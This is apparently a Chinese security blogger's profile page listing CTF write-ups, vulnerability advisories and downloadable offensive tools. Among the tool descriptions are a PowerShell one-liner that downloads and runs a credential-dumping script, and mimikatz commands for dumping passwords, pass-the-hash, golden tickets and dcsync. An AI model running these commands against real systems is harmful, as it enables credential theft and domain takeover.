爱国小白帽

更好都不行,我只做最好

  • 博客(401)
  • 资源 (29)
  • 论坛 (6)
  • 问答 (1)
  • 收藏
  • 关注

原创 从CTF比赛真题中学习压缩包伪加密与图片隐写术【文中工具已打包】

先讲个笑话,刚刚打完MAR DASCTF明御攻防赛,一如往常,很轻松便拿到了两个flag(签到与问卷),哈哈,一个脑细胞都不用消耗本文知识点:遇到加密压缩文件怎么办遇到图片隐写的几种验证方法十六进制数据还原文件大佬就不用看了,全是小白操作这是一道misc题,结合了压缩包伪加密与图片隐写技术,我们就以它为例学习一下这两种常见技术的解决方法就是这个压缩文件,后面带*说明需要密码,但是题中没有任何密码提示,ctf中不可能让你无脑爆破,因为时间是有限的,但也有可能是弱口令,反正无从下手先爆破一

2021-03-29 11:46:37 3722 8

原创 【防守方基础】危险报文识别

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有信息泄露类这种情况是最常见的,也是最难以捕获的,因为它也许不用攻击数据就能轻易获取,尤其是报错或探针页面,配置不当可能泄露很多东西别看它危害小,但往往某个不起眼的信息就可以改变战局命令执行类此类攻击多以echo、curl、wget、cd、ping、cat、ls等命令出现,还是很好辨认的在GET参数中执行命令在POST.

2021-03-10 15:56:41 5729 21

原创 CTFHub技能书-Web-信息泄露类解题过程合集

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有目录遍历:这个没有技术含量,一层一层找就行了PHPINFO:搜索关键字ctfhub{就能看到flag了备份文件下载:网站源码:网站以提示了几种压缩文件后缀,猜测备份文件名是以www开头,尝试发现名为www.zip里面有个flag文件但点开之后发现没有这是ctf惯用套路,访问即可bak文件:题目.

2021-03-01 23:51:23 678 9

原创 【情人节警报】看我如何智斗陌陌情爱骗子

1、骗子加群,主动钓鱼我在陌陌建了个东北老乡群,情人节前一天收到了这个小(da)姑(pian)凉(zi)的加群申请骗子的惯用套路,进来就问谁能帮个忙结果还真有人信,为了我的群友不被骗(当然不是和他抢),我决定一探究竟看她资料有几张照片,貌似挺正常再看动态,第一条9小时前??在别的群我看到有人发了这个我转发到群里,他也否认了在当天他还加了很多其他群,估计一样的套路2、和她周旋,套取信息聊了几句之后他就开始借钱了问了他姓名(假的)和手机号,但是没有绑定QQ和微信,所以我

2021-02-14 15:57:58 3031 20

原创 HoneyDrive_3蜜罐系统的安装部署及使用指南

HoneyDrive是主要的蜜罐Linux发行版。它是安装了Xubuntu Desktop 12.04.4 LTS版的虚拟设备(OVA)。它包含10多个预安装和预配置的蜜罐软件包,例如Kippo SSH蜜罐,Dionaea和Amun恶意软件蜜罐,Honeyd低交互蜜罐,Glastopf Web蜜罐和Wordpot,Conpot SCADA / ICS蜜罐,Thug和PhoneyC honeyclients等。此外,它包括许多有用的预配置脚本和实用程序,以分析,可视化和处理它可以捕获的数据,例如Kipp.

2021-01-27 13:32:31 3223 16

原创 我的网安之路——2020年总结

前言:转眼投入这行也算一年了,从20多年没碰过电脑的小白白,到坐拥上千粉丝的博主,我用了三个月。现在一年过去了,粉丝到了3k+,虽然不多,但是很铁,因为我的文章收藏量总是很多精彩人生从此刻开始初相识艰辛路感恩感谢写作的经验有惊喜有失落你关注公众号没 相遇即是缘,点赞加留言 初自我介绍网络昵称:admin-root博客地址:admin-root.blog.csdn.net性别:男年龄:24学历:大专公众号:爱国小白帽爱好:打各种球、下各.

2021-01-09 15:32:25 3938 36

原创 30余种加密编码类型的密文特征分析(建议收藏)

一、md5一般MD5值是32位由数字“0-9”和字母“a-f”所组成的字符串,如图。如果出现这个范围以外的字符说明这可能是个错误的md5值,就没必要再拿去解密了。16位值是取的是8~24位。md5的三个特征:确定性:一个原始数据的MD5值是唯一的,同一个原始数据不可能会计算出多个不同的MD5值。碰撞性:原始数据与其MD5值并不是一一对应的,有可能多个原始数据计算出来的MD5值是一样的,这就是碰撞。不可逆:也就是说如果告诉你一个MD5值,你是无法通过它还原出它的原始数据的,这不是你的技术不够牛,

2020-11-11 18:53:01 7502 10

原创 网络安全相关行业必备网站(持续更新中)

更新时间:2020年10月22日11:37:29更新内容:更新了码农常用工具直达目录信息收集类搜索引擎指纹识别whois查询子域名爆破端口扫描综合查询身份信息泄露查询威胁情报C段查询:[webscan.cc](https://webscan.cc)加密解密类md5base64站长工具:[tool.chinaz.com](http://tool.chinaz.com/Tools/Unicode.aspx)零宽隐写:[yuanfux.github.io](https://yuanfux.github.i.

2020-10-14 16:16:13 4056 10

原创 蓝军HVV实用工具和网站总结(工具已打包)

这篇文章排版不是很好建议公众号查看→点击进入很抱歉,来晚了,转眼已经第十天了,昨天得知很多单位都退(chu)场(ju)了,真是遗憾,希望剩下的单位能坚持到最后,我知道我这点东西帮不了太多忙,要想取得最后的胜利还需要各岗位人员的密切配合和技术大佬的支撑。不过这些工具和网站还是有点用的,对于监控人员来说可以起到事半功倍的效果。因为在我一晚上封了近700个IP,手脚麻木,筋都快断了的情况下悟出一个真理,工具能自动完成的东西你就别手动了,真会猝死的!!!下面讲重点,记好了。威胁情报01微步在线htt

2020-09-20 14:04:32 3120 2

原创 渗透测试岗位面试题多人实战大汇总
原力计划

常见面试题总结1、假如给你一个网站你怎么去渗透?信息收集首先看是什么类型的网站,针对不同类型的网站有不同的信息搜集方案,如大型企业网站可以用天眼查,启信宝等查询法人股份等信息,小型网站可以查询使用了哪类建站系统 1,whois查詢,获取注册者邮箱姓名电话等。 2,查询服务器旁站以及子域名站点,因为主站一般比较难,所以先看看旁站有没有通用性的cms或者其他漏洞。 3,查看服务器操...

2020-04-16 21:02:55 8354 8

原创 企业级内网的域控环境搭建3万字详细部署教程
原力计划

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理实验环境:环境搭建:模拟实验:...

2020-03-29 14:21:00 4029 12

原创 企业级内网环境搭建2万字详细教程
原力计划

简单说明:环境需要四台虚拟机,每一台分别充当企业内不同的功能分区,在真实环境中的配置还需视情况自行更改内网搭建示意图目录指南所需设备:内网环境搭建:pfSense安装及使用说明基本安装过程主机端配置过程浏览器端安装过程测试主机之间的连通情况修改各服务器的IP配置检测网络连通情况设置dhcp为办公区分配IP更改防火墙规则只允许办公区上网设置防火墙规则允许全部机器上网设置防火墙规则使外网能访...

2020-03-25 21:18:40 6300 28

原创 一个简单的bat脚本便可实现局域网所有存活IP的精准扫描

此脚本的扫描可在几秒钟之内完成脚本内容无需更改,如下:@echo offFOR /L %%I in (1,1,255) do ping 192.168.1.%%I -n 1 -w 100arp -a >C:\Users\Administrator\Desktop\1.txtexit保存后双击执行就会出现1.txt文件,里面会出现所有存活主机的IP...

2020-03-23 23:45:34 1818 2

原创 【专题文章导航】本篇收录了SQL注入、漏洞复现、后渗透、新增漏洞报告四个专题的所有文章

SQL注入篇漏洞复现篇新增漏洞报告mysql 联合查询注入文件上传之js绕过【威胁通告】Apache Tomcat 文件包含漏洞(CVE-2020-1938)威胁通告对information_schema数据库的解析文件上传之mime绕过【威胁通告】微软 SQL Server 远程代码执行漏洞(CVE-2020-0618)威胁通告盲注iis6.0解析漏洞...

2020-03-07 11:54:33 1227 2

转载 Cisco Unified套件 远程代码执行漏洞通告

报告编号:B6-2021-040802报告来源:360CERT报告作者:360CERT更新日期:2021-04-080x01 漏洞简述2021年04月08日,360CERT监测发现Cisco发布了Unified系列组件的风险通告,漏洞编号为CVE-2021-1362,漏洞等级:高危,漏洞评分:8.8。Cisco Unified 套件是思科统一通信解决方案中强大的呼叫处理组件。该组件的中存在一处远程代码执行漏洞,针对该漏洞利用需要攻击者拥有系统的登录凭据。对此,360CERT建议广大用户及时.

2021-04-09 15:10:52 10

转载 Cisco Small Business RV 路由器多个高危漏洞通告

报告编号:B6-2021-040801报告来源:360CERT报告作者:360CERT更新日期:2021-04-080x01 漏洞简述2021年04月08日,360CERT监测发现Cisco发布了Cisco Small Business RV Series Routers多个漏洞的风险通告,漏洞编号为CVE-2021-1472,CVE-2021-1473,漏洞等级:高危,漏洞评分:8.5。对此,360CERT建议广大用户及时将Cisco Rv VPN 路由器升级到最新版本。与此同时,请做好资.

2021-04-09 15:09:57 7

转载 Cisco SD-WAN vManage多个高危漏洞通告

报告编号:B6-2021-040803报告来源:360CERT报告作者:360CERT更新日期:2021-04-080x01 漏洞简述2021年04月08日,360CERT监测发现Cisco官方发布了SD-WAN vManage多个漏洞风险通告,此次通告的漏洞编号分别为CVE-2021-1479,CVE-2021-1137,CVE-2021-1480,其中包含1个严重漏洞,2个高危漏洞,此次通告评分:9.8。Cisco SD-WAN为思科提出的企业广域网解决方案,思科以安全能力为核心,通过W.

2021-04-09 15:08:38 7

转载 Linux系统下查找安装包所在目录的六种方法

想知道Linux系统下安装了哪些软件包,以及软件包安装在哪个目录下,可以用以下6种命令1. whichwhich命令查找出相关命令是否已经在搜索路径中,例子如下:$which gcc //显示出GNC的C编译器安装在哪个目录返回结果为:/usr/bin/gcc注意:如果which没有找到要找的命令,可以试试whereis,该命令搜索更大的范围的系统目录。有些系统上的which命令不显示用户没有执行权限的文件。例如$which ipppd/usr/bin/which :no ipppd in

2021-04-01 11:56:33 33

转载 VMWare vRealize SSRF、任意文件上传漏洞风险通告

报告编号:B6-2021-033101报告来源:360CERT报告作者:360CERT更新日期:2021-03-310x01 漏洞简述2021年03月31日,360CERT监测发现VMWare发布了VMSA-2021-0004的风险通告,漏洞编号为CVE-2021-21975,CVE-2021-21983,漏洞等级:高危,漏洞评分:8.6。VMware vRealize Operations 可在由 AI 提供支持的统一平台中针对私有云、混合云和多云环境提供自动配置 IT 运维管理套件。本.

2021-03-31 12:09:42 74

转载 漏洞分析 | WP Super Cache远程代码执行漏洞分析

0x01 WP Super Cache 介绍WP Super Cache是WordPress的一个插件,主要用来缓存加速网页数据的。笔者发现管理后台再向缓存配置文件写入数据时过滤不严谨导致可以植入恶意代码,进而导致远程代码执行。WordPress官方已经在最新版1.7.2中修复了此漏洞。受影响版本:<= 1.7.10x02 漏洞复现首先登陆管理后台,找到WP Super Cache的设置页面,通常URL为**/wp-admin/options-general.php?page=wpsupe.

2021-03-31 12:08:27 40

转载 OpenSSL 拒绝服务、证书绕过漏洞通告

报告编号:B6-2021-032601报告来源:360CERT报告作者:360CERT更新日期:2021-03-260x01漏洞简述2021年03月26日,360CERT监测发现OpenSSL发布了OpenSSL的安全更新风险通告,漏洞编号为CVE-2021-3450,CVE-2021-3449,漏洞等级:高危,漏洞评分:8.8。OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,同时确认连接者身份。这个包广泛被应用在互联网的网页服务器上。例如:cisco设备,ap.

2021-03-26 23:54:22 479 1

转载 ntopng 权限绕过与任意代码执行漏洞通告

报告编号:B6-2021-032401报告来源:360CERT报告作者:360CERT更新日期:2021-03-240x01漏洞简述2021年03月23日,360NoahLab发布了关于ntopng的风险通告,漏洞编号为CVE-2021-28073/CVE-2021-28074,漏洞等级:高危,漏洞评分:8.0。ntopng 是一套开源的网络流量监控工具,提供基于 Web 界面的实时网络流量监控。支持跨平台,包括 Windows、Linux 以及 MacOS。ntopng 使用 C++ 语言开.

2021-03-25 12:34:24 64

转载 Cisco Jabber 多个高危漏洞风险通告

报告编号:B6-2021-032501报告来源:360CERT报告作者:360CERT更新日期:2021-03-250x01漏洞简述2021年03月25日,360CERT监测发现Cisco发布了Jabber的安全更新风险通告,漏洞编号为CVE-2021-1411,CVE-2021-1469,CVE-2021-1417,CVE-2021-1471,CVE-2021-1418,漏洞等级:严重,漏洞评分:9.9。该漏洞目前尚未被广泛利用。Cisco Jabber是一个网络会议和即时消息传递应用程序,.

2021-03-25 12:33:30 54

转载 CVE-2021-21087: Adobe ColdFusion远程代码执行漏洞通告

报告编号:B6-2021-032301报告来源:360CERT报告作者:360CERT更新日期:2021-03-230x01漏洞简述2021年03月23日,360CERT监测发现Adobe官方发布了Adobe ColdFusion的风险通告,漏洞编号为CVE-2021-21087,漏洞等级:严重,漏洞评分:9.8。Adobe ColdFusion是一个商用的快速应用程序开发平台,ColdFusion经常用在数据驱动的网站及内部网的开发上,但也可以用来生成包括SOAP Web服务及Flash远程.

2021-03-24 12:08:34 78

转载 漏洞情报 | Apache OFBiz 远程代码执行漏洞

0x01 漏洞描述OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。近日,360漏洞云监测到Apache OFBiz官方披露了Apache OFBiz远程代码执行漏洞的安全通告,该漏洞出现在ofbiz/base/util/SafeObjectInputStream.java中,该功能为框架中的通用序列化处理类,未经身份验证的攻击者可构造恶意请求.

2021-03-22 11:29:40 68

转载 【更新:POC公开】F5 多个严重漏洞通告

报告编号:B6-2021-031901报告来源:360CERT报告作者:360CERT更新日期:2021-03-190x01更新概览2021年03月19日,360CERT监测发现CVE-2021-22986的 POC 已经公开。本次更新漏洞状态及复现截图。具体更新详情可参考漏洞详情。0x02漏洞简述2021年03月11日,360CERT监测发现F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行,代码执行的风险通告,该漏洞编号为CVE-2021-22986,CVE-2021-2298.

2021-03-20 09:17:32 111

转载 漏洞情报 | SonicWall SMA100 多个漏洞通告

0x01 漏洞简介Sonicwall:成立于 1991 年,主要进行全面互联网安全解决方案的设计、开发和生产,为广大的市场提供访问安全、增值安全服务和交易安全产品。近日,360漏洞云监测到Sonicwall官方发布了旗下SonicWall SMA100产品多个漏洞的安全通告,CVE编号包括CVE-2021-20017,CVE-2021-20018。0x02 漏洞详情CVE-2021-20017 SonicWall SMA100远程命令执行漏洞漏洞描述:此漏洞允许经过身份验证的攻击者以’nobo.

2021-03-16 09:04:11 90

转载 XStream 多个高危漏洞通告

报告编号:B6-2021-031502报告来源:360CERT报告作者:360CERT更新日期:2021-03-150x01事件简述2021年03月15日,360CERT监测发现Xstream官方发布了Xstream 安全更新,漏洞等级:高危,漏洞评分:8.8。POC已经在官网公开对此,360CERT建议广大用户及时将Xstream升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。0x02风险等级360CERT对该事件的评定结果如下评定方式等级.

2021-03-16 09:02:52 217

转载 F5 多个严重漏洞通告

报告编号:B6-2021-031101报告来源:360CERT报告作者:360CERT更新日期:2021-03-110x01漏洞简述2021年03月11日,360CERT监测发现F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行,代码执行的风险通告,该漏洞编号为CVE-2021-22986,CVE-2021-22987,CVE-2021-22992.CVE-2021-22991,漏洞等级:严重,漏洞评分:9.8。F5 安全通告更新了 BIG-IP、BIG-IQ 中的多个严重漏洞。对此.

2021-03-12 09:09:35 208

转载 2021-03 补丁日: 微软多个高危漏洞通告

报告编号:B6-2021-031001报告来源:360CERT报告作者:360CERT更新日期:2021-03-100x01事件简述2021年03月10日,360CERT监测发现微软发布了3月安全更新的风险通告,事件等级:严重,事件评分:9.8。此次安全更新发布了89个漏洞的补丁,主要涵盖了以下组件: Windows操作系统、Azure、IE和Edge、Exchange Server、Office、SharePoint Server,Visual Studio,和Hyper-V。其中包括14个.

2021-03-10 16:09:02 243

转载 【POC公开】CVE-2021-1732: Microsoft Windows本地提权漏洞通告

报告编号:B6-2021-031002报告来源:360CERT报告作者:360CERT更新日期:2021-03-100x01漏洞简述2021年03月10日,360CERT监测发现CVE-2021-1732漏洞细节与POC已经公开,漏洞等级:高危,漏洞评分:7.8。成功利用该漏洞的Windows本地攻击者可以提升到system权限。该漏洞poc已经公开对此,360CERT建议广大用户及时更新Winodws补丁。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。0x02风险等级360.

2021-03-10 16:08:00 618

原创 window命令禁用用户及解禁方法

net user查看用户net user 用户名 /active:no禁用用户net user DefaultAccount查看用户状态未禁用状态如果管理员用户被禁用可看下面文章解禁https://blog.csdn.net/qq_42534026/article/details/105583942

2021-03-05 21:02:04 130 2

转载 VMware View Planner 远程代码执行漏洞通告

报告编号:B6-2021-030401报告来源:360CERT报告作者:360CERT更新日期:2021-03-050x01事件简述2021年03月04日,360CERT监测发现VMware发布了View Planner的风险通告,该漏洞编号为CVE-2021-21978,事件等级:高危,事件评分:8.6。View Planner 在处理上传文件时存在一处漏洞。该漏洞允许攻击者上传文件至任意目录,并在特定情况下导致远程代码执行。该漏洞poc已经公开对此,360CERT建议广大用户及时将vi.

2021-03-05 17:52:03 205

转载 Microsoft Exchange多个高危漏洞 (CVE-2021-26855/26857/26858/27065)

\1. 通告信息2021年03月04日,安识科技A-Team团队监测到微软官方发布了Microsoft Exchange安全更新,披露了包括CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065等多个高危漏洞。\2. 漏洞概述Microsoft Exchange Server 是个消息与协作系统。Exchange Server可以被用来构架应用于企业、学校的邮件系统或免费邮件系统。2021年03月03日微软官方披露多个Excha.

2021-03-05 17:40:57 2129

转载 Microsoft Exchange Server中的四个零日漏洞已被链接使用在野袭击

CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065:被在野利用的Microsoft Exchange Server中的四个零日漏洞。背景美国时间3月2日,Microsoft发布了专门的安全公告,以解决Microsoft Exchange Server中四个在野外被利用的零日漏洞。在一篇博客文章中,Microsoft将对这些缺陷的利用归因于一个名为HAFNIUM的国家背景资助的黑客组织。微软博客称,该组织历来以美国机构为目标,其中包

2021-03-04 08:43:35 601

转载 微软Exchange多个高危漏洞通告

报告编号:B6-2021-030301报告来源:360CERT报告作者:360CERT更新日期:2021-03-030x01事件简述2021年03月03日,360CERT监测发现微软发布了Exchange 多个高危漏洞的风险通告,该漏洞编号为CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065,事件等级:严重,事件评分:9.8。对此,360CERT建议广大用户及时将exchange升级到最新版本。与此同时,请做好资产自查以及预防.

2021-03-03 23:47:26 429 1

转载 SaltStack 多个高危漏洞通告

报告编号:B6-2021-022601报告来源:360CERT报告作者:360CERT更新日期:2021-02-260x01事件简述2021年02月26日,360CERT监测发现SaltStack发布了2月份安全更新的风险通告 ,事件等级:高危,事件评分:8.1。SaltStack在本次更新中修复了 10 个漏洞,其中包含6个高危漏洞。对此,360CERT建议广大用户及时将SaltStack升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。0x02风险等级360CE.

2021-03-01 17:53:09 130

转载 CVE-2021-21972 vCenter 远程命令执行漏洞分析

报告编号:B6-2021-022501报告来源:360NoahLab报告作者:Ricter更新日期:2021-02-250x01漏洞简介vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。vSphere Clien.

2021-02-25 21:24:33 1972 2

转载 VMware多个高危漏洞通告

报告编号:B6-2021-022401报告来源:360CERT报告作者:360CERT更新日期:2021-02-240x01事件简述2021年02月24日,360CERT监测发现VMware发布了Vcenter Server、ESXI的风险通告,事件等级:严重,事件评分:9.8。VMware更新了ESXI和vSphere Client(HTML5)中的两个高危漏洞,具有网络端口访问权限的恶意攻击者可以通过漏洞执行任意代码。对此,360CERT建议广大用户及时将Vcenter Server与E.

2021-02-24 14:47:38 307

转载 CVE-2020-17523:Apache Shiro身份认证绕过漏洞通告

报告编号:B6-2021-020302报告来源:360CERT报告作者:360CERT更新日期:2021-02-030x01漏洞简述2021年02月03日,360CERT监测发现Apache Shiro发布了Apache Shiro 验证绕过漏洞的风险通告,该漏洞编号为CVE-2020-17523,漏洞等级:中危,漏洞评分:7.0。当Apache Shiro与Spring框架结合使用时,在一定权限匹配规则下,攻击者可通过构造特殊的 HTTP 请求包绕过身份认证。对此,360CERT建议广大用.

2021-02-22 09:47:01 401

冰蝎window版Behinder_v3.0_Beta_6_win .zip

Behinder “冰蝎”动态二进制加密网站管理客户端 功能介绍原文链接: 《利用动态二进制加密实现新型一句话木马之客户端篇》 https://xz.aliyun.com/t/2799 工作原理原文链接: 《利用动态二进制加密实现新型一句话木马之Java篇》 https://xz.aliyun.com/t/2744 《利用动态二进制加密实现新型一句话木马之.NET篇》 https://xz.aliyun.com/t/2758 《利用动态二进制加密实现新型一句话木马之PHP篇》 https://xz.aliyun.com/t/2774 运行环境 客户端:jre8+ 服务端:.net

1969-12-12

2020HW工具包.zip

原则文章蓝军HVV实用工具和网站总结(工具已打包) :https://admin-root.blog.csdn.net/article/details/108692522

1969-12-18

DVWA-安全测试靶场.zip

Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。 它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是 实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。 一般的用法说明 它取决于用户如何DVWA方法。 要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。 没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。 请注意,有 记录和无证的弱点 用这个软件。 这是故意的。 你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。 这将演示如何添加另一层的安全可能会阻止某些恶意行为。 注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。 还有额外的链接进一步背景阅读,这涉及到安全问题。

2020-02-19

CTF伪加密和图片隐写破解工具包.zip

集合了压缩包伪加密和图片隐写破解的多种工具

2021-03-29

PEiD0.95.zip

PE iDentifier v0.95 (2008.10.21) by snaker, Qwerton, Jibz & xineohP ------------------------------------------------------ PEiD detects most common packers, cryptors and compilers for PE files. It can currently detect more than 600 different signatures in PE files. PEiD is special in some aspects

1969-12-10

QuarksPwDump_v0.1.zip

先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具,目前除此之外还木有没有任何一款工具可以导出如此全面的信息,支持这么多的OS版本,(包括xP/2003/Vista/7/2008/8),经测试相当稳定。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程,工作原理是神马呢,源代码值得读一下。 源地址在这:http://code.google.com/p/quarkspwdump/ 可以导出 : - Local accounts NT/LM hashes + history 本地NT/LM哈希+历史登录记录 - Domain accounts NT/LM hashes + history 域中NT/LM哈希+历史登录记录 - Cached domain password 缓存里的域密码 - Bitlocker recovery information (recovery passwords &amp; key packages) 使用了Bitlocker的恢复信息(恢复密码&amp;关键包) 用法参考说明如下: quarks-pwdump.exe &lt;option(s)&gt; &lt;NTDS file&gt; Options :参数 –dump-hash-local /*Dump出本机HASH*/ -dump-hash-domain-cached /*Dump出域内缓存的Hash*/ -dump-hash-domain (NTDS_FILE must be specified) /*Dump出域内的Hash,NTDS_FILE必须被指定*/ –dump-bitlocker (NTDS_FILE must be specified) /*Dump出BitLocker遗留信息*/ –with-history (optional) -output-type JOHN/LC (optional, if no=&gt;JOHN) /*导出为Lc4或John The Ripper支持的格式*/ –output FILE (optional, if no=&gt;stdout) /*导出结果到文件*/ 木有其他系统 请大家另行测试。 如需导出可以 C:\&gt;quarkspwdump --dump-hash-local --output c:\xxxxx C:\&gt;quarkspwdump --dump-hash-local --output-type LC --output c:\xxxxx

2020-03-16

扫描工具大合集,包括代理、IP、端口、目录等扫描

扫描工具大合集,包括代理、IP、端口、目录等扫描

1970-01-04

hash密码抓取工具大全

hash密码抓取提取密码工具大全

2020-03-25

tunna实用工具

tunna实用工具

2020-03-25

漏洞利用EXP windows-kernel-exploits-master.zip

本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。

2020-03-10

后渗透专用的提权大马

木马(Trojan),也称木马病毒,是指通过特定的程序(木马程序)来控制另一台计算机。木马通常有两个可执行程序:一个是控制端,另一个是被控制端。木马这个名字来源于古希腊传说(荷马史诗中木马计的故事,Trojan一词的特洛伊木马本意是特洛伊的,即代指特洛伊木马,也就是木马计的故事)。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种主机的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。   小马体积小,容易隐藏,隐蔽性强

2020-03-10

nc端口监听工具瑞士军刀

什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速                                                                                                                

2020-03-11

dedecmsV5.7靶机源码.zip

DedeCMS应用领域 DedeCMS适合应用于以下领域: •企业网站,无论大型还是中小型企业,利用网络传递信息在一定程度上提高了办事的效率,提高企业的竞争力; •政府机关,通过建立政府门户,有利于各种信息和资源的整合,为政府和社会公众之间加强联系和沟通,从而使政府可以更快、更便捷、更有效开展工作; •教育机构,通过网络信息的引入,使得教育机构之间及教育机构内部和教育者之间进行信息传递,全面提升教育类网站的层面; •媒体机构,互联网这种新媒体已经强而有力的冲击了传统媒体,在这个演变过程中,各类媒体机构应对自己核心有一个重新认识和重新发展的过程,建立一个数字技术平台以适应数字化时代的需求; •行

2020-12-25

华军1433mssql数据库弱口令扫描工具

华军1433mssql数据库弱口令扫描工具

2020-03-25

Invoke-WCMDump结合powershell进行密码获取

Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作,系统会自动填入凭据,实现自动登录,凭据保存在特定的位置,被称作为保管库(vault)(位于%localappdata%/Microsoft\Vault) 从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump"

2020-03-26

mimikatz,ms14068

mimikatz mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes). If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases Quick usage log privilege::debug sekurlsa sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd kerberos kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi crypto crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local Build mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are: - for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 - http://www.microsoft.com/download/details.aspx?id=44914) - for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =) Synchronize! - GIT URL is : https://github.com/gentilkiwi/mimikatz.git - SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk - ZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zip Build the solution - After opening the solution, Build / Build Solution (you can change architecture) - 